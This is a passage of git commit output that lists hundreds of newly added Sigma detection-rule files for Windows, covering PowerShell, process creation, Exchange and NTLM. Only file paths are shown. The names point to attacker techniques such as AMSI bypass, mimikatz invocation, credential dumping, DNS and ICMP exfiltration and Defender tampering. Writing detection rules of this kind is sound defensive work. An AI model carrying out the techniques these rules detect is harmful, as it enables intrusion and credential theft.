tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Peach-Sandstorm/proc_creation_win_apt_peach_sandstorm_indicators.yml create mode 100644 tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_add_rule.yml create mode 100644 tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml create mode 100644 tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_change_rule.yml create mode 100644 tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_delete_all_rules.yml create mode 100644 tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_delete_rule.yml create mode 100644 tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_failed_load_gpo.yml create mode 100644 tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_reset_config.yml create mode 100644 tools/sigmac/converted_rules/builtin/firewall_as/win_firewall_as_setting_change.yml create mode 100644 tools/sigmac/converted_rules/builtin/lsa_server/win_lsa_server_normal_user_admin.yml create mode 100644 tools/sigmac/converted_rules/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml create mode 100644 tools/sigmac/converted_rules/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml create mode 100644 tools/sigmac/converted_rules/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml create mode 100644 tools/sigmac/converted_rules/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml create mode 100644 tools/sigmac/converted_rules/builtin/msexchange/win_exchange_set_oabvirtualdirectory_externalurl.yml create mode 100644 tools/sigmac/converted_rules/builtin/msexchange/win_exchange_transportagent.yml create mode 100644 tools/sigmac/converted_rules/builtin/msexchange/win_exchange_transportagent_failed.yml create mode 100644 tools/sigmac/converted_rules/builtin/ntlm/win_susp_ntlm_auth.yml create mode 100644 tools/sigmac/converted_rules/builtin/ntlm/win_susp_ntlm_brute_force.yml create mode 100644 tools/sigmac/converted_rules/builtin/ntlm/win_susp_ntlm_rdp.yml create mode 100644 tools/sigmac/converted_rules/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml create mode 100644 tools/sigmac/converted_rules/builtin/placeholder/process_creation/proc_creation_win_userdomain_variable_enumeration.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_classic/posh_pc_abuse_nslookup_with_dns_records.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_classic/posh_pc_downgrade_attack.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_classic/posh_pc_exe_calling_ps.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_classic/posh_pc_powercat.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_classic/posh_pc_remote_powershell_session.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_classic/posh_pc_remotefxvgpudisablement_abuse.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_classic/posh_pc_renamed_powershell.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_classic/posh_pc_susp_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_classic/posh_pc_susp_get_nettcpconnection.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_classic/posh_pc_susp_zip_compress.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_classic/posh_pc_tamper_windows_defender_set_mp.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_classic/posh_pc_xor_commandline.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_clear_powershell_history.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_decompress_commands.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_exploit_scripts.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_get_addbaccount.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_get_clipboard.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_clip.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_obfuscated_iex.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_stdin.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_var.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_compress.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_rundll.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_stdin.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_clip.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_mhsta.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_rundll32.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_invoke_obfuscation_via_var.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_malicious_commandlets.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_remote_powershell_session.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_remotefxvgpudisablement_abuse.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_susp_ad_group_reco.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_susp_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_susp_get_nettcpconnection.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_susp_invocation_generic.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_susp_invocation_specific.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_susp_local_group_reco.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_susp_smb_share_reco.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_susp_zip_compress.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_access_to_browser_login_data.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_active_directory_module_dll_import.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_add_windows_capability.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_adrecon_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_amsi_null_bits_bypass.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_apt_silence_eda.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_as_rep_roasting.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_audio_exfiltration.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_automated_collection.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_capture_screenshots.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_clear_powershell_history.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_copy_item_system_directory.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_cor_profiler.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_create_local_user.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_detect_vm_env.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_directorysearcher.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_disable_psreadline_command_history.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_disable_windows_optional_feature.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_dnscat_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_dotnet_assembly_from_file.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_download_com_cradles.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_dump_password_windows_credential_manager.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_enable_psremoting.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_enable_susp_windows_optional_feature.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_enumerate_password_windows_credential_manager.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_etw_trace_evasion.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_export_certificate.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_frombase64string_archive.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_get_acl_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_get_adcomputer.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_get_adgroup.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_get_adreplaccount.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_get_childitem_bookmarks.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_get_process_security_software_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_hktl_rubeus.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_hktl_winpwn.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_hotfix_enum.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_icmp_exfiltration.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_install_unsigned_appx_packages.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_invoke_command_remote.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_clip.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_obfuscated_iex.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_stdin.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_var.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_compress.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_stdin.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_clip.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_mhsta.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_rundll32.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_var.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_keylogging.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_localuser.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_mailboxexport_share.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_malicious_commandlets.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_malicious_keywords.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_modify_group_policy_settings.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_msxml_com.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_ntfs_ads_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_office_comobject_registerxll.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_potential_invoke_mimikatz.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_prompt_credentials.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_psasyncshell.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_psattack.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_remote_session_creation.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_remotefxvgpudisablement_abuse.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_resolve_list_of_ip_from_file.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_root_certificate_installed.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_send_mailmessage.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_set_acl.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_set_acl_susp_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_shellcode_b64.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_software_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_store_file_in_alternate_data_stream.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_ace_tampering.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_ad_group_reco.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_alias_obfscuation.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_directory_enum.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_execute_batch_script.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_extracting.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_follina_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_get_current_user.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_get_gpo.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_get_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_gettypefromclsid.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_invocation_generic.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_invocation_specific.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_iofilestream.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_keywords.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_local_group_reco.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_mail_acces.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_mounted_share_deletion.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_networkcredential.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_new_psdrive.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_recon_export.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_remove_adgroupmember.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_set_alias.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_smb_share_reco.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_start_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_unblock_file.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_wallpaper.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_win32_pnpentity.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_windowstyle.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_write_eventlog.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_susp_zip_compress.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_tamper_windows_defender_rem_mp.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_tamper_windows_defender_set_mp.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_test_netconnection.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_timestomp.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_token_obfuscation.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_user_profile_tampering.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_veeam_credential_dumping_script.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_win32_nteventlogfile_usage.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_win32_product_install_msi.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_win_api_susp_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_win_defender_exclusions_added.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_winlogon_helper_dll.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_wmi_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_wmimplant.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_x509enrollment.yml create mode 100644 tools/sigmac/converted_rules/builtin/powershell/powershell_script/posh_ps_xml_iex.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_7zip_exfil_dmp_files.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_7zip_password_compression.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_7zip_password_extraction.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_adplus_memory_dump.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_agentexecutor_susp_usage.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_appvlp_uncommon_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_aspnet_compiler_exectuion.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_aspnet_compiler_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_aspnet_compiler_susp_paths.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_at_interactive_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_attrib_hiding_files.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_attrib_system.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_attrib_system_susp_paths.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_auditpol_nt_resource_kit_usage.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_auditpol_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_bash_command_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_bash_file_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_bcdedit_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_bitsadmin_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_browsers_chromium_headless_exec.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_browsers_chromium_load_extension.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_browsers_inline_file_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_browsers_remote_debugging.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_browsers_tor_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_calc_uncommon_exec.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_certmgr_certificate_installation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_certoc_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_certoc_download_direct_ip.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_certoc_load_dll.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_certutil_certificate_installation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_certutil_decode.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_certutil_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_certutil_download_direct_ip.yml create mode 100644 